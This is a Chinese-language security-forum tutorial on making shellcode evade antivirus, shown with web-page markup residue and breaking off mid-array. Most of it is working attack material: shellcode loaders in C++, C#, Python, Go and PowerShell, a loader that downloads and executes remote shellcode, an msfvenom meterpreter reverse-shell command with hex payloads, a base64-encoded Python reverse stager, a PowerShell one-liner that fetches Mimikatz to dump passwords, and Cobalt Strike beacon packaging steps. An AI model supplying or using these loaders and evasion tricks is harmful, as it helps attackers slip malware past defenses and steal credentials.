<div class="row2">
<div class="span10">
<script src="/static/plugins/toc/jquery.toc.min.js"></script>
<script src="/static/plugins/toc/toc.min.js"></script>
<script src="/static/js/dt.js"></script>
<div class="box-container">
<div class="main-topic">
<div class="clearfix user-info topic-list">
<p><span class="content-title ">那些shellcode免杀总结</span>
</p>
<div class="topic-info">
<span class="info-left">
<a href="/u/15540">
<span class="username cell"> 卿i</span></a> <span class="i-seprator"> / </span>
<span> 2020-02-07 08:57:08</span><span class="i-seprator"> / </span>
<span>浏览数 6918</span>
<span class="content-node">
<span class="label label-default label-node-first">
<a href="/tab/1">安全技术</a></span>
<span class="label label-default">
<a href="/node/23">二进制安全</a></span>
</span>
</span>
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href="javascript:" onclick="voteUp(7170);">
顶(0)</a>
<a class="vote vote-down" href="javascript:" onclick="voteDown(7170);">
踩(0)</a></span>
</div>
</div>
<hr>
<div id="topic_content" class="topic-content markdown-body">
<p></p><p>自己还是想把一些shellcode免杀的技巧通过白话文、傻瓜式的文章把技巧讲清楚。希望更多和我一样web狗也能动手做到免杀的实现。</p>
文中我将shellcode免杀技巧分为 "分离“、”混淆“两个大类,通过不同技巧针对不同检测方式,也就是常听到的特征检测、行为检测、云查杀。
个人能力有限,文中出现错误还请斧正、轻喷。
0x01 那些shellcode"分离"免杀
首先来看看关于shellcode常用得C/C++加载方式
常见方式比如函数指针执行、内联汇编指令、伪指令等方式。
但是这种shellcode明显 和执行程序在一起很容易被查杀
所以大多数分离免杀的思想就是把执行shellcode和加载程序分开。
来看看常见的分离加载 拿C++举例
正常使用像 VirtualAlloc 内存操作的函数执行shellcode :
#include "stdafx.h"
#include "windows.h"
using namespace std;
int main(int argc, char **argv)
{
unsigned char buf[] =
“\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30”
“\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff”
“\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52”
“\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1”
“\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b”
“\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03”
“\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b”
“\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24”
“\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb”
“\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f”
“\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5”
“\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a”
“\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00”;
void exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, buf, sizeof buf);
((void()())exec)();
return 0;
}
如果要把shellcode单独分离 我们可以通过其他当时获取到shellcode,而不是事先讲shellcode写死在程序中。
举例:shellcode从文本提取或从远程下载获取。
这里就把shellcode通过http请求(使用winhttp api)获取赋值到内存缓存数组,动态分配内存执行shellcode:
#include "stdafx.h"
#include <string>
#include <iostream>
#include <windows.h>
#include <winhttp.h>
#pragma comment(lib,"winhttp.lib")
#pragma comment(lib,"user32.lib")
using namespace std;
void main()
{
DWORD dwSize = 0;
DWORD dwDownloaded = 0;
LPSTR pszOutBuffer = NULL;
HINTERNET hSession = NULL,
hConnect = NULL,
hRequest = NULL;
BOOL bResults = FALSE;
hSession = WinHttpOpen(L"User-Agent", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
if (hSession)
{
hConnect = WinHttpConnect(hSession, L"127.0.0.1", INTERNET_DEFAULT_HTTP_PORT, 0);
}
<span class="k">if</span> <span class="p">(</span><span class="n">hConnect</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">hRequest</span> <span class="o">=</span> <span class="n">WinHttpOpenRequest</span><span class="p">(</span><span class="n">hConnect</span><span class="p">,</span> <span class="sa">L</span><span class="s">"POST"</span><span class="p">,</span> <span class="sa">L</span><span class="s">"qing.txt"</span><span class="p">,</span> <span class="sa">L</span><span class="s">"HTTP/1.1"</span><span class="p">,</span> <span class="n">WINHTTP_NO_REFERER</span><span class="p">,</span> <span class="n">WINHTTP_DEFAULT_ACCEPT_TYPES</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">LPCWSTR</span> <span class="n">header</span> <span class="o">=</span> <span class="sa">L</span><span class="s">"Content-type: application/x-www-form-urlencoded/r/n"</span><span class="p">;</span>
<span class="n">SIZE_T</span> <span class="n">len</span> <span class="o">=</span> <span class="n">lstrlenW</span><span class="p">(</span><span class="n">header</span><span class="p">);</span>
<span class="n">WinHttpAddRequestHeaders</span><span class="p">(</span><span class="n">hRequest</span><span class="p">,</span> <span class="n">header</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">(</span><span class="n">len</span><span class="p">),</span> <span class="n">WINHTTP_ADDREQ_FLAG_ADD</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hRequest</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">std</span><span class="o">::</span><span class="n">string</span> <span class="n">data</span> <span class="o">=</span> <span class="s">"name=host&sign=xx11sad"</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">ss</span> <span class="o">=</span> <span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">data</span><span class="p">.</span><span class="n">c_str</span><span class="p">();</span>
<span class="n">bResults</span> <span class="o">=</span> <span class="n">WinHttpSendRequest</span><span class="p">(</span><span class="n">hRequest</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">const_cast</span><span class="o"><</span><span class="kt">void</span> <span class="o">*></span><span class="p">(</span><span class="n">ss</span><span class="p">),</span> <span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">(),</span> <span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">(),</span> <span class="mi">0</span><span class="p">);</span>
<span class="c1">bResults=WinHttpSendRequest(hRequest,WINHTTP_NO_ADDITIONAL_HEADERS, 0,WINHTTP_NO_REQUEST_DATA, 0, 0, 0 );</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">bResults</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">bResults</span> <span class="o">=</span> <span class="n">WinHttpReceiveResponse</span><span class="p">(</span><span class="n">hRequest</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">bResults</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">do</span>
<span class="p">{</span>
<span class="c1">// Check for available data.</span>
<span class="n">dwSize</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">WinHttpQueryDataAvailable</span><span class="p">(</span><span class="n">hRequest</span><span class="p">,</span> <span class="o">&</span><span class="n">dwSize</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Error %u in WinHttpQueryDataAvailable.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">dwSize</span><span class="p">)</span>
<span class="k">break</span><span class="p">;</span>
<span class="n">pszOutBuffer</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">char</span><span class="p">[</span><span class="n">dwSize</span> <span class="o">+</span> <span class="mi">1</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">pszOutBuffer</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Out of memory</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ZeroMemory</span><span class="p">(</span><span class="n">pszOutBuffer</span><span class="p">,</span> <span class="n">dwSize</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">WinHttpReadData</span><span class="p">(</span><span class="n">hRequest</span><span class="p">,</span> <span class="p">(</span><span class="n">LPVOID</span><span class="p">)</span><span class="n">pszOutBuffer</span><span class="p">,</span> <span class="n">dwSize</span><span class="p">,</span> <span class="o">&</span><span class="n">dwDownloaded</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Error %u in WinHttpReadData.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"ok"</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//char ShellCode[1024];</span>
<span class="kt">int</span> <span class="n">code_length</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">pszOutBuffer</span><span class="p">);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">ShellCode</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">calloc</span><span class="p">(</span><span class="n">code_length</span> <span class="o">/</span><span class="mi">2</span> <span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">));</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">count</span> <span class="o"><</span> <span class="n">code_length</span> <span class="o">/</span> <span class="mi">2</span><span class="p">;</span> <span class="n">count</span><span class="o">++</span><span class="p">){</span>
<span class="n">sscanf</span><span class="p">(</span><span class="n">pszOutBuffer</span><span class="p">,</span> <span class="s">"%2hhx"</span><span class="p">,</span> <span class="o">&</span><span class="n">ShellCode</span><span class="p">[</span><span class="n">count</span><span class="p">]);</span>
<span class="n">pszOutBuffer</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%s"</span><span class="p">,</span> <span class="n">ShellCode</span><span class="p">);</span>
<span class="c1">//strcpy(ShellCode,pszOutBuffer);</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">exec</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span> <span class="n">ShellCode</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">exec</span><span class="p">,</span> <span class="n">ShellCode</span><span class="p">,</span> <span class="k">sizeof</span> <span class="n">ShellCode</span><span class="p">);</span>
<span class="p">((</span><span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">exec</span><span class="p">)();</span>
<span class="k">delete</span><span class="p">[]</span> <span class="n">pszOutBuffer</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">dwDownloaded</span><span class="p">)</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">dwSize</span> <span class="o">></span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hRequest</span><span class="p">)</span> <span class="n">WinHttpCloseHandle</span><span class="p">(</span><span class="n">hRequest</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hConnect</span><span class="p">)</span> <span class="n">WinHttpCloseHandle</span><span class="p">(</span><span class="n">hConnect</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hSession</span><span class="p">)</span> <span class="n">WinHttpCloseHandle</span><span class="p">(</span><span class="n">hSession</span><span class="p">);</span>
<span class="n">system</span><span class="p">(</span><span class="s">"pause"</span><span class="p">);</span>
}
看下查杀情况: 去除shellcode后火绒已经不杀了
类似这种远程读取中还有很多 ,类如powershell内存加载,相信各位也没少用过
举例:powershell远程加载mimikatz读取密码
powershell IEX (New-Object Net.WebClient).DownloadString('
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1’); Invoke-Mimikatz >>c:\1.txt
类似的还有很多,不过这种用得很多内存加载有些杀软还是拦的,怎么解决我们文后面再说。
其实到这里,用的最多的语言加载器的原理不用说也知道了,这里还是解释下加载器,引用我同事对加载器的解释:
shellcode就好比一杯水,加载器就是装水的杯子,水倒进了杯子才可以喝,shellcode被加载器装载后才可以执行。
A)那些加载器执行shellcode:
ssi:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.174.142 LPORT=4444 -f c > msf.txt
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of c file: 1457 bytes
cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a68c0a8ae84680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5
shellcode_launcher:
c#加载:
using System;
using System.Runtime.InteropServices;
namespace TCPMeterpreterProcess
{
class Program
{
static void Main(string[] args)
{
// native function’s compiled code
// generated with metasploit
byte[] shellcode = new byte[333] {
<span class="p">};</span>
<span class="n">UInt32</span> <span class="n">funcAddr</span> <span class="p">=</span> <span class="n">VirtualAlloc</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="p">(</span><span class="n">UInt32</span><span class="p">)</span><span class="n">shellcode</span><span class="p">.</span><span class="n">Length</span><span class="p">,</span>
<span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="n">Marshal</span><span class="p">.</span><span class="n">Copy</span><span class="p">(</span><span class="n">shellcode</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="p">(</span><span class="n">IntPtr</span><span class="p">)(</span><span class="n">funcAddr</span><span class="p">),</span> <span class="n">shellcode</span><span class="p">.</span><span class="n">Length</span><span class="p">);</span>
<span class="n">IntPtr</span> <span class="n">hThread</span> <span class="p">=</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">;</span>
<span class="n">UInt32</span> <span class="n">threadId</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span>
<span class="c1">// prepare data</span>
<span class="n">IntPtr</span> <span class="n">pinfo</span> <span class="p">=</span> <span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">;</span>
<span class="c1">// execute native code</span>
<span class="n">hThread</span> <span class="p">=</span> <span class="n">CreateThread</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="n">funcAddr</span><span class="p">,</span> <span class="n">pinfo</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="k">ref</span> <span class="n">threadId</span><span class="p">);</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">hThread</span><span class="p">,</span> <span class="m">0</span><span class="n">xFFFFFFFF</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">private</span> <span class="k">static</span> <span class="n">UInt32</span> <span class="n">MEM_COMMIT</span> <span class="p">=</span> <span class="m">0</span><span class="n">x1000</span><span class="p">;</span>
<span class="k">private</span> <span class="k">static</span> <span class="n">UInt32</span> <span class="n">PAGE_EXECUTE_READWRITE</span> <span class="p">=</span> <span class="m">0</span><span class="n">x40</span><span class="p">;</span>
[DllImport(“kernel32”)]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport(“kernel32”)]
private static extern bool VirtualFree(IntPtr lpAddress,
UInt32 dwSize, UInt32 dwFreeType);
[DllImport(“kernel32”)]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport(“kernel32”)]
private static extern bool CloseHandle(IntPtr handle);
[DllImport(“kernel32”)]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
[DllImport(“kernel32”)]
private static extern IntPtr GetModuleHandle(
string moduleName
);
[DllImport(“kernel32”)]
private static extern UInt32 GetProcAddress(
IntPtr hModule,
string procName
);
[DllImport(“kernel32”)]
private static extern UInt32 LoadLibrary(
string lpFileName
);
[DllImport(“kernel32”)]
private static extern UInt32 GetLastError();
}
}
py加载:
import base64,sys;
import ctypes
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
ctypes.windll.user32.ShowWindow(whnd, 0)
ctypes.windll.kernel32.CloseHandle(whnd)
exec(base64.b64decode({2:str,3:lambda b:bytes(b,‘UTF-8’)}[sys.version_info[0]](‘aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4zMCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=’)))
go内联c加载:
package main
import “C”
import “unsafe”
func main() {
buf := “”
buf += “xddxc6xd9x74x24xf4x5fx33xc9xb8xb3x5ex2c”
…省略…
buf += “xc9xb1x97x31x47x1ax03x47x1ax83xc7x04xe2”
// at your call site, you can send the shellcode directly to the C
// function by converting it to a pointer of the correct type.
shellcode := []byte(buf)
C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}
资源加载:CPLResourceRunner
cat shellcode.txt |sed 's/[, ]//g; s/0x//g;' |tr -d '\n' |xxd -p -r |gzip -c |base64 > b64shellcode.txt
用Cobalt Strike 生成shellcode
Attacks -> Packages -> Windows Executable (s) -> Output => RAW (x86)
py -2 ConvertShellcode.py beacon.bin
Shellcode written to shellcode.txt
0x4d,0x5a,0x41,0x52,0x55,0x48,0x89,0xe5,0x48,0x81,0xec,0x20,0x00,0x00,0x00,0x48,0x8d,0x1d,0xea,0xff,0xff,0xff,0x48,0x89,0xdf,0x48,0x81,0xc3,0x7c,0x79,0x01,0x00,0xff,0xd3,0x41,0xb8,0xf0,0xb5,0xa2,0x56,0x68,0x04,0x00,0x00,0x00,0x5a,0x48,0x89,0xf9,0xff,0xd0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0x00,0x00,0x00,0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc9,0xdb,0x6e,0xe9,0x8d,0xba,0x00,0xba,0x8d,0xba,0x00,0xba,0x8d,0xba,0x00,0xba,0xeb,0x54,0xd2,0xba,0x15,0xba,0x00,0xba,0x13
cat shellcode.txt |sed ‘s/[, ]//g; s/0x//g;’ |tr -d ‘n’ |xxd -p -r |gzip -c |base64 > b64shellcode.txt
H4sIAPGjM14AA/ONcgwK9eh86tH4RoGBgcGjV/bVPTrvezQerqlkZPh/2XHHh62LwjJYgLJR
Hp0//19ggIEfQMwnv4uPYQvnWcUdjD5nFUMyMosVCory04sScxWSE/Py8ksUklIVikrzFDLzFFz8
gxVy81NS9Xi5VKBGnLyd97J3F8MuGH4dcmmXKJAWBgD9vO6hmAAAAA==
Compile to x86 and copy CPLResourceRunner.dll to RunMe.cpl
powershell加载(MMFml):
namespace mmfExeTwo
{
using System;
using System.IO.MemoryMappedFiles;
using System.Runtime.InteropServices;
class Program
{
<span class="nx">private</span> <span class="nx">delegate</span> <span class="nx">IntPtr</span> <span class="nx">NewDelegate</span><span class="p">();</span>
<span class="c1">// To handle the location by applying the appropriate type</span>
<span class="c1">// We had to create a delegate to handle the the pointer to the location where we shim in the shellcode</span>
<span class="c1">// into the Memory Mapped File. This allows the location of the opp code to be referenced later for execution</span>
<span class="nx">private</span> <span class="nx">unsafe</span> <span class="nx">static</span> <span class="nx">IntPtr</span> <span class="nx">GetShellMemAddr</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">// 64bit shell code. Tested on a win10 system. Injects "cmd -k calc"</span>
<span class="c1">// was generated vanilla using "msfvenom -p windows/exec CMD="cmd /k calc" EXITFUNC=thread C -f powershell"</span>
<span class="kd">var</span> <span class="nx">shellcode</span> <span class="p">=</span> <span class="nx">new</span> <span class="kt">byte</span><span class="p">[]</span>
<span class="p">{</span>
<span class="mh">0xfc</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x83</span><span class="p">,</span><span class="mh">0xe4</span><span class="p">,</span><span class="mh">0xf0</span><span class="p">,</span><span class="mh">0xe8</span><span class="p">,</span><span class="mh">0xc0</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x51</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x50</span><span class="p">,</span><span class="mh">0x52</span><span class="p">,</span><span class="mh">0x51</span><span class="p">,</span>
<span class="mh">0x56</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x31</span><span class="p">,</span><span class="mh">0xd2</span><span class="p">,</span><span class="mh">0x65</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x52</span><span class="p">,</span><span class="mh">0x60</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x52</span><span class="p">,</span><span class="mh">0x18</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x52</span><span class="p">,</span>
<span class="mh">0x20</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x72</span><span class="p">,</span><span class="mh">0x50</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x0f</span><span class="p">,</span><span class="mh">0xb7</span><span class="p">,</span><span class="mh">0x4a</span><span class="p">,</span><span class="mh">0x4a</span><span class="p">,</span><span class="mh">0x4d</span><span class="p">,</span><span class="mh">0x31</span><span class="p">,</span><span class="mh">0xc9</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x31</span><span class="p">,</span><span class="mh">0xc0</span><span class="p">,</span>
<span class="mh">0xac</span><span class="p">,</span><span class="mh">0x3c</span><span class="p">,</span><span class="mh">0x61</span><span class="p">,</span><span class="mh">0x7c</span><span class="p">,</span><span class="mh">0x02</span><span class="p">,</span><span class="mh">0x2c</span><span class="p">,</span><span class="mh">0x20</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0xc1</span><span class="p">,</span><span class="mh">0xc9</span><span class="p">,</span><span class="mh">0x0d</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0xc1</span><span class="p">,</span><span class="mh">0xe2</span><span class="p">,</span><span class="mh">0xed</span><span class="p">,</span>
<span class="mh">0x52</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x51</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x52</span><span class="p">,</span><span class="mh">0x20</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x42</span><span class="p">,</span><span class="mh">0x3c</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0xd0</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x80</span><span class="p">,</span><span class="mh">0x88</span><span class="p">,</span>
<span class="mh">0x00</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x85</span><span class="p">,</span><span class="mh">0xc0</span><span class="p">,</span><span class="mh">0x74</span><span class="p">,</span><span class="mh">0x67</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0xd0</span><span class="p">,</span><span class="mh">0x50</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x18</span><span class="p">,</span><span class="mh">0x44</span><span class="p">,</span>
<span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x40</span><span class="p">,</span><span class="mh">0x20</span><span class="p">,</span><span class="mh">0x49</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0xd0</span><span class="p">,</span><span class="mh">0xe3</span><span class="p">,</span><span class="mh">0x56</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0xff</span><span class="p">,</span><span class="mh">0xc9</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x34</span><span class="p">,</span><span class="mh">0x88</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span>
<span class="mh">0x01</span><span class="p">,</span><span class="mh">0xd6</span><span class="p">,</span><span class="mh">0x4d</span><span class="p">,</span><span class="mh">0x31</span><span class="p">,</span><span class="mh">0xc9</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x31</span><span class="p">,</span><span class="mh">0xc0</span><span class="p">,</span><span class="mh">0xac</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0xc1</span><span class="p">,</span><span class="mh">0xc9</span><span class="p">,</span><span class="mh">0x0d</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0xc1</span><span class="p">,</span>
<span class="mh">0x38</span><span class="p">,</span><span class="mh">0xe0</span><span class="p">,</span><span class="mh">0x75</span><span class="p">,</span><span class="mh">0xf1</span><span class="p">,</span><span class="mh">0x4c</span><span class="p">,</span><span class="mh">0x03</span><span class="p">,</span><span class="mh">0x4c</span><span class="p">,</span><span class="mh">0x24</span><span class="p">,</span><span class="mh">0x08</span><span class="p">,</span><span class="mh">0x45</span><span class="p">,</span><span class="mh">0x39</span><span class="p">,</span><span class="mh">0xd1</span><span class="p">,</span><span class="mh">0x75</span><span class="p">,</span><span class="mh">0xd8</span><span class="p">,</span><span class="mh">0x58</span><span class="p">,</span><span class="mh">0x44</span><span class="p">,</span>
<span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x40</span><span class="p">,</span><span class="mh">0x24</span><span class="p">,</span><span class="mh">0x49</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0xd0</span><span class="p">,</span><span class="mh">0x66</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x0c</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x44</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x40</span><span class="p">,</span><span class="mh">0x1c</span><span class="p">,</span><span class="mh">0x49</span><span class="p">,</span>
